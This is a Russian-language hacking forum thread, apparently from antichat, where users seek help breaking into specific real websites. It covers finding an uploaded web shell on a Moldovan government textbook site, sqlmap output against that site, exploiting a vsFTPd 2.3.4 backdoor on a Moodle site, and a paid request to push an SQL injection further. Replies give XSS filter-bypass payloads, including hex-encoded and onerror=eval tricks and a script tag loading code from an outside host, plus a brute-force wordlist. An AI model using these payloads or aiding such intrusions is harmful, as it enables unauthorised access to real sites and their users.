Ваши вопросы по уязвимостям.

Привет, помогите узнать где залился файл filemanager.php7 из раздела "Clasa a I-a" http://ctice.gov.md/manuale-scolare/

http://ctice.md/public/download.php?id=249

 

[01:38:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[01:38:29] [INFO] fetching database names
[01:38:29] [INFO] fetching number of databases
[01:38:30] [INFO] resumed: ЩЩ
[01:38:30] [ERROR] unable to retrieve the number of databases
[01:38:30] [INFO] falling back to current database
[01:38:30] [INFO] fetching current database
[01:38:30] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files
[01:38:30] [INFO] resumed: `к?
available databases [1]:
[*] `к?
Как с этим бороться?

 

--hex по пробуй

 

Пробовал,тамперы перепробовал

 

А чем можно заменить （）в

＜script＞alert(1)＜/script＞

 

пробуй alert`aaa`
вот тебе пример https://forum.antichat.ru/threads/424991/page-17

но если отработает такая штука, то алерт не нужен
<script src=//lala.com/lala.js>

 

Не выходя из ＜script＞нужно выполнить xss без ;()

 

Charencode helps bypass "The URI you submitted has disallowed characters.", but the vector fails.

 

Code:

document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//

 

Code:

onerror=eval;throw'=alert\x281\x29'

Больше нравится (с предварительной записью в window.name, который передается в рамках одного окна)

Code:

onerror=eval;throw window.name

 

Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их

 

миллиона тебе достаточно? много не всегда есть хорошо

Code:

https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt

 

http://e-learn.i5t.ru/ можно ли ,что-либо сделать?

 

учиться можно, вот https://e-learn.i5t.ru/enrol/index.php?id=2 ))

 

Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)

 

Какой модуль msf вы используете? Сам сайт крyтится на moodle, а FTP порт скорее всего открыт хостером.

 

VSFTPD v2.3.4

 

Бэкдор то была всего несколько дней, не факт что она там есть, либо хостеру совсем уж пох..

 

Если присутствует, то как возможно раскрутить?

 

Всем привет,помогите пожалуйста ситуация такая:
Appspider(Rapid7) находит sql уязвимость "Double-float overflow" отправляя значение "1e309" как данные POST запросом,в ответе Mysql2::Error: Unknown column 'Infinity' in 'field list': INSERT INTO `interactions` (`accept_langs`, `browser`, `browser_version`....перечисление всех колонок) при ЛЮБЫХ других значениях кроме "1e309(и выше 1e310..)" ошибки НЕТ,sqlmap не может раскрутить ее,пробовал фазерам через owasp большим списком также ошибок других не нашлось реакция только на 1e309.
И из всего этого вопрос как ее раскрутить в sqlmap?готов оплатить за помощь если кто знает как решить,моя телега @S920799